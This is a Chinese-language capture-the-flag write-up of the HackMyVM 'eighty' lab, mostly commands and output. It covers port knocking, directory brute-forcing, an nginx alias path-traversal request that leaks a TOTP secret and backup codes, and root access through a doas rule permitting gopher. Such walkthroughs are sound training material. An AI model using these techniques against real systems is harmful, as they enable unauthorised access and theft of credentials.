当前位置: 首页 > article >正文

【hackmyvm】eigthy 靶机wp


tags:

  • HMV
  • gopher
  • doas另类sudo提权
  • knock
  • 目录穿越
    Type: wp
    dg-publish: true
    难度: ⭐️⭐️⭐️
    作者: sml
    系统: Linux

这里写目录标题

    • 2. 信息收集
      • 2.1. 端口扫描
      • 2.2. knock敲门
      • 2.3. 目录扫描
      • 2.4. 目录穿越
    • 3. 提权

2. 信息收集

2.1. 端口扫描

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# nmap -sVC  192.168.56.8 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 22:33 EST
Nmap scan report for 192.168.56.8
Host is up (0.000055s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE    SERVICE VERSION
22/tcp open     ssh     OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
|   2048 c9:ce:d7:2a:f9:48:25:65:a9:33:4b:d5:01:e1:2c:52 (RSA)
|   256 7e:3d:4d:b4:82:0b:13:eb:db:50:e3:60:70:f0:4a:ad (ECDSA)
|_  256 7f:9d:13:c8:7b:d9:37:1d:cb:ff:e9:ce:f5:90:c3:32 (ED25519)
70/tcp open     http    pygopherd web-gopher gateway
|_http-title: Gopher
| gopher-ls:
|_[txt] /howtoconnect.txt "Connection"
80/tcp filtered http
MAC Address: 08:00:27:8C:94:BE (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 9.10 seconds

80端口被防火墙过滤了
70端口有一个 gopher 服务 里面有一个 howtoconnect.txt

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8:70/howtoconnect.txt
Ping us to: 4767 2343 3142

这应该就是提示我们依次敲门打开80端口了

2.2. knock敲门

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# knock 192.168.56.8 4767 2343 3142 -v
hitting tcp 192.168.56.8:4767
hitting tcp 192.168.56.8:2343
hitting tcp 192.168.56.8:3142

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# nmap 192.168.56.8 -p-
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-19 22:37 EST
Nmap scan report for 192.168.56.8
Host is up (0.00044s latency).
Not shown: 65532 closed tcp ports (reset)
PORT   STATE SERVICE
22/tcp open  ssh
70/tcp open  gopher
80/tcp open  http
MAC Address: 08:00:27:8C:94:BE (Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 1.75 seconds


┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8
Hi.
<!-- 80 -->

这时候发现80端口就开放了

2.3. 目录扫描

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# dirsearch -u http://192.168.56.8
/usr/lib/python3/dist-packages/dirsearch/dirsearch.py:23: DeprecationWarning: pkg_resources is deprecated as an API. See https://setuptools.pypa.io/en/latest/pkg_resources.html
  from pkg_resources import DistributionNotFound, VersionConflict

  _|. _ _  _  _  _ _|_    v0.4.3
 (_||| _) (/_(_|| (_| )

Extensions: php, aspx, jsp, html, js | HTTP method: GET | Threads: 25 | Wordlist size: 11460

Output File: /root/Desktop/hmv/eighty/reports/http_192.168.56.8/_24-12-19_22-38-36.txt

Target: http://192.168.56.8/

[22:38:36] Starting:
[22:38:51] 200 -   18B  - /robots.txt

Task Completed

里面有一个 /robots.txt


┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8/robots.txt
/nginx_backup.txt

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl 192.168.56.8/nginx_backup.txt
server {
        listen 80 default_server;
        listen [::]:80 default_server;
        root /var/www/html;
        index index.html index.htm index.nginx-debian.html;
        server_name _;
        location / {
                try_files $uri $uri/ =404;
        }
}

server {
server_name henry.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
        location /web {
                alias /home/henry/web/;
        }
  }

server {
server_name susan.eighty.hmv;
root /var/www/html;
index index.html index.htm index.nginx-debian.html;
        location /web {
                alias /home/susan/web/;
        }
  }

可以获取到一个nginx的配置文件
里面发现了两个域名 henry.eighty.hmv susan.eighty.hmv 还有这两个用户 henry susan
配置到hosts

这里还可以获取到两个路径
henry.eighty.hmv/web/
susan.eighty.hmv/web/

对这两个路径都进行目录爆破
在susan的目录下可以获取到一个文件

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# gobuster dir -u  susan.eighty.hmv/web/ -w /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt -x php,html,zip,jpg,png,txt,rar
===============================================================
Gobuster v3.6
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://susan.eighty.hmv/web/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-lowercase-2.3-medium.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.6
[+] Extensions:              jpg,png,txt,rar,php,html,zip
[+] Timeout:                 10s
===============================================================
Starting gobuster in directory enumeration mode
===============================================================
/index.html           (Status: 200) [Size: 40]
/lostpasswd.txt       (Status: 200) [Size: 50]
Progress: 1661144 / 1661152 (100.00%)
===============================================================
Finished
===============================================================

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl http://susan.eighty.hmv/web/lostpasswd.txt
8ycrois-tu0 + /home/susan/secret/.google-auth.txt


2.4. 目录穿越

这里告诉了我们一个路径 /home/susan/secret/.google-auth.txt
我们可以利用目录穿越读取度这个文件

因为 location /web 写的不规范 正确应该是 location /web/

┌──(root㉿kali)-[~/Desktop/hmv/eighty]
└─# curl http://susan.eighty.hmv/web../secret/.google-auth.txt
2GN7KARBONVR55R7SP3UZPN3ZM
" RATE_LIMIT 3 30
" WINDOW_SIZE 17
" DISALLOW_REUSE
" TOTP_AUTH
71293338
48409754
27074208
60216448
17908010

这是一段 TOTP(基于时间的一次性密码,Time-Based One-Time Password) 配置文件,通常用于双因素身份验证(2FA)的种子和相关参数
2GN7KARBONVR55R7SP3UZPN3ZM是 TOTP 的密钥种子(Secret Key),通常是一个 Base32 编码的字符串。它用于生成时间敏感的一次性密码

简单来说就是还要输入一次验证码 。这里验证码选择下面任意一个即可
利用密码 8ycrois-tu0 和验证码登录上去


┌──(root㉿kali)-[~]
└─# ssh susan@192.168.112.23
(susan@192.168.112.23) Password:
(susan@192.168.112.23) Verification code:
Linux eighty 4.19.0-14-amd64 #1 SMP Debian 4.19.171-2 (2021-01-30) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
Last login: Wed Apr  7 07:05:11 2021
susan@eighty:~$


susan@eighty:~$ sh flag.sh

                                   .     **
                                *           *.
                                              ,*
                                                 *,
                         ,                         ,*
                      .,                              *,
                    /                                    *
                 ,*                                        *,
               /.                                            .*.
             *                                                  **
             ,*                                               ,*
                **                                          *.
                   **                                    **.
                     ,*                                **
                        *,                          ,*
                           *                      **
                             *,                .*
                                *.           **
                                  **      ,*,
                                     ** *,
-------------------------

PWNED HOST: eighty

PWNED DATE: Thu 19 Dec 2024 11:48:18 PM EST

WHOAMI: uid=1000(susan) gid=1000(susan) groups=1000(susan),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev)

FLAG: hmv8use0red

------------------------

3. 提权

susan@eighty:~$ find / -perm -4000 2>/dev/null
/usr/local/bin/doas
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/eject/dmcrypt-get-device
/usr/lib/openssh/ssh-keysign
/usr/bin/chfn
/usr/bin/gpasswd
/usr/bin/passwd
/usr/bin/umount
/usr/bin/su
/usr/bin/newgrp
/usr/bin/chsh
/usr/bin/mount

这里发现了一个 doas
https://book.hacktricks.xyz/zh/linux-hardening/privilege-escalation#doas

有一些替代 sudo 二进制文件的选项,例如 OpenBSD 的 doas,请记得检查其配置文件 /etc/doas.conf
permit nopass demo as root cmd vim

susan@eighty:~$ find / -name doas.conf 2>/dev/null
/usr/local/etc/doas.conf
susan@eighty:~$ cat /usr/local/etc/doas.conf
permit nolog susan as root cmd gopher

可以发现允许我们使用 root 权限执行 gopher

doas -u root gopher
输密码 然后输入!

Spawning your default shell.  Type 'exit' to return to Gopher.

root@eighty:/home/susan# id
uid=0(root) gid=0(root) groups=0(root)
root@eighty:/home/susan# whoami
root
root@eighty:/home/susan#


root@eighty:~# sh fl4g.sh

                                   .     **
                                *           *.
                                              ,*
                                                 *,
                         ,                         ,*
                      .,                              *,
                    /                                    *
                 ,*                                        *,
               /.                                            .*.
             *                                                  **
             ,*                                               ,*
                **                                          *.
                   **                                    **.
                     ,*                                **
                        *,                          ,*
                           *                      **
                             *,                .*
                                *.           **
                                  **      ,*,
                                     ** *,
-------------------------

PWNED HOST: eighty

PWNED DATE: Fri Dec 20 00:01:53 EST 2024

WHOAMI: uid=0(root) gid=0(root) groups=0(root)

FLAG: rooted80shmv

------------------------


http://www.kler.cn/a/448076.html

相关文章:

  • 模仿elementui的Table,实现思路
  • 【085】基于51单片机PID直流电机控制系统【Proteus仿真+Keil程序+报告+原理图】
  • MySQL深度解析:高效查询优化与实战案例
  • 前端关于pptxgen.js个人使用介绍
  • 2024年港澳台华侨生联考师范类院校录取情况来
  • CMD使用SSH登陆Ubuntu
  • 无人机视频传输系统的通信能耗优化
  • 拷贝构造和赋值运算符重载
  • 质量小议51 - 茧房
  • 主要模型记录
  • Ubuntu系统安装MySQL
  • GA-BP分类-遗传算法(Genetic Algorithm)和反向传播算法(Backpropagation)
  • java全栈day18--Web后端实战(java操作数据库2)
  • Linux export命令
  • Elasticsearch:什么是查询语言?
  • C++ 杨辉三角 - 力扣(LeetCode)
  • 如何制作搞笑配音视频?操作方法
  • 智能电商:API接口如何驱动自动化与智能化转型
  • Yolo11改进策略:主干网络改进|FastVit与Yolo11完美融合,重参数重构Yolo11网络(全网首发)
  • 插入排序与计数排序;数据库的三范式
  • DC-9靶场练习
  • JavaScript 类型转换的意外
  • 数组相关简单算法
  • List直接使用removeAll报错
  • 线性表查找:Python 实现与性能分析
  • 基于UNITY3D的照片墙演示项目技术分享